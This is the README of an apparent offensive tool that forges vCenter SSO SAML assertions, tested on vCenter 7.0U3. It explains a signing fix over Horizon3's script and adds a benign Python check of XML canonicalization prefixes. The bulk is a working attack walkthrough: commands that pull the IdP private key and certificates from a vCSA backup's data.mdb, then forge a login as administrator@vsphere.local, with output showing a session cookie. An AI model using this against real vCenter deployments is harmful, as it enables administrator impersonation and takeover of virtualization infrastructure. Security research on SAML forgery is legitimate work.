# vCenter Forge SAML

This is tested on vCenter 7.0U3, based on Horizon3's [vcenter_saml_login](https://github.com/horizon3ai/vcenter_saml_login).

Their script didn't work out of the box for me, and it seems like the error is in the signing of the SAML, as the `<ec:InclusiveNamespaces..>` is missing.

```xml
<!-- Horizon3's signed XML -->
<ds:Transforms>
    <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
    <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</ds:Transforms>

<!-- My signed XML -->
<ds:Transforms>
    <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
    <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#">
        <ec:InclusiveNamespaces xmlns:ec="http://www.w3.org/2001/10/xml-exc-c14n#" PrefixList="xsd xsi"/>
    </ds:Transform>
</ds:Transforms>
```
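Added example (not part of the original notes or of Horizon3's script): a standard-library Python check for troubleshooting signature validation. It reads the `<ds:Transforms>` structure shown above and reports namespace prefixes that are referenced only from `xsi:type` values and that no `PrefixList` covers; exclusive canonicalization leaves such declarations out of the signed bytes unless they are listed. The function names and the trimmed sample document (including its `xsi:type="xsd:string"` attribute) are constructed assumptions.

```python
import xml.etree.ElementTree as ET

DS = "http://www.w3.org/2000/09/xmldsig#"
EXC = "http://www.w3.org/2001/10/xml-exc-c14n#"
XSI = "http://www.w3.org/2001/XMLSchema-instance"

def inclusive_prefixes(signed_xml):
    """Union of PrefixList entries found on exc-c14n transforms."""
    prefixes = set()
    for transform in ET.fromstring(signed_xml).iter(f"{{{DS}}}Transform"):
        if transform.get("Algorithm") != EXC:
            continue  # e.g. the enveloped-signature transform
        for inc in transform.findall(f"{{{EXC}}}InclusiveNamespaces"):
            prefixes.update(inc.get("PrefixList", "").split())
    return prefixes

def xsi_type_prefixes(signed_xml):
    """Prefixes referenced from xsi:type values such as 'xsd:string'.
    Exclusive c14n does not treat these as visibly utilized."""
    found = set()
    for element in ET.fromstring(signed_xml).iter():
        value = element.get(f"{{{XSI}}}type")
        if value and ":" in value:
            found.add(value.split(":", 1)[0])
    return found

def uncovered_prefixes(signed_xml):
    """Prefixes whose declarations exc-c14n omits from the canonical form."""
    return xsi_type_prefixes(signed_xml) - inclusive_prefixes(signed_xml)

# Constructed sample, trimmed to the elements the check reads.
SAMPLE = """<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
    xmlns:ds="http://www.w3.org/2000/09/xmldsig#"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <ds:Transforms>
    <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
    <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#">%s</ds:Transform>
  </ds:Transforms>
  <saml:AttributeValue xsi:type="xsd:string">constructed</saml:AttributeValue>
</saml:Assertion>"""
INCLUSIVE = ('<ec:InclusiveNamespaces '
             'xmlns:ec="http://www.w3.org/2001/10/xml-exc-c14n#" '
             'PrefixList="xsd xsi"/>')

if __name__ == "__main__":
    print("without PrefixList:", uncovered_prefixes(SAMPLE % ""))
    print("with PrefixList:   ", uncovered_prefixes(SAMPLE % INCLUSIVE))
```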

```bash
## Download data.mdb from vCSA backup. (Usually in lotus_backup.tar.gz)
$ ls -al
-rw-rw-r-- 1 void void     6134 Dec  4 09:33 assert.xml.erb
-rw------- 1 void void 40910848 Dec  4 13:20 data.mdb
-rw-rw-r-- 1 void void    12072 Dec  5 08:51 vcenter_forge_saml.rb
-rw-rw-r-- 1 void void     4702 Dec  5 08:51 vcenter_mdb_extractor.rb

## Execute 'vcenter_mdb_extractor.rb' to extract key and certs.
$ ruby vcenter_mdb_extractor.rb -h
Usage: vcenter_mdb_extractor [options]
    -d, --mdb /path/to/data.mdb

$ ruby vcenter_mdb_extractor.rb --mdb data.mdb
[+] Extracting from file: data.mdb
[+] Extracting vCenter SSO IdP Private key
[+] Extracting vCenter SSO IdP certificate
[+] Extracting vCenter VMCA root certificate
[+] Extraction done, output writen to ./output

$ ls -al ./output 
total 20
drwxrwxr-x 2 void void 4096 Dec  5 08:51 .
drwxrwxr-x 3 void void 4096 Dec  5 08:51 ..
-rw-rw-r-- 1 void void 1679 Dec  5 08:51 idp_cert.key
-rw-rw-r-- 1 void void 1318 Dec  5 08:51 idp_cert.pem
-rw-rw-r-- 1 void void 1468 Dec  5 08:51 vmca_cert.pem

## Execute 'vcenter_forge_saml.rb' to forge a SAML Request
$ ruby vcenter_forge_saml.rb -h
Usage: vcenter_forge_saml [options]
    -f, --fqdn <fqdn>                (Required) vCenter FQDN/Hostname
    -k, --key idp_cert.key           vCenter SSO IdP Private key. Default: ./output/idp_cert.key
    -c, --cert idp_cert.pem          vCenter SSO IdP certificate. Default: ./output/idp_cert.pem
    -v, --vmca vmca_cert.pem         vCenter VMCA root certificate. Default: ./output/vmca_cert.pem
    -u, --user username              vCenter Username to impersonate. Default: administrator
    -d, --domain domain              vCenter domain. Default: vsphere.local

$ ruby vcenter_forge_saml.rb --fqdn vcenter.target.local
Forgin SAML Request for 'administrator@vsphere.local' on 'vcenter.target.local'.
 [+] Validated FQDN: vcenter.target.local
 [+] Validated SSO IdP trusted certificate chain
 [+] Generated SAML response XML
 [+] Extracted RelayState: e044eb6b-d5d5-48f5-8843-4f83e5f48afe
 [+] Signed SAML assertion
 [+] Successfully authenticated to vSphere/vCenter!
 [+] Session cookie: VSPHERE-UI-JSESSIONID=84D394608A08CE9E11532F2B6A5BDB91; Path=/ui
```

